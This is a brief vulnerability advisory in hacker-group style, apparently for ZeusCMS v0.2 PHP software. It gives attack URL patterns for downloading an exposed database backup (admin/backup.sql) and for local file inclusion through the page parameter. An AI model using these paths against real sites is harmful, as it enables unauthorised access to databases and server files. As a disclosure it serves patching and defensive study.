[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
[»] ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities
[»] Script: [ ZeusCMS ]
[»] Language: [ PHP ]
[»] Site page:[ ZeusCMS is yet another Content Management System ]
[»] Download: [ http://sourceforge.net/projects/zeuscms/files/ZeusCMS%20v0.2/ ]
[»] Founder:[ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to:[ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
[»] My Home:[ HackTeach.Org , Islam-Attack.Com ]
===[ Database Backup Dump ]===
[»] http://[target].com/[path]/admin/backup.sql
===[ Local File Include ]===
[»] http://[target].com/[path]/index.php?page=[LFI]
Author: ViRuSMaN <-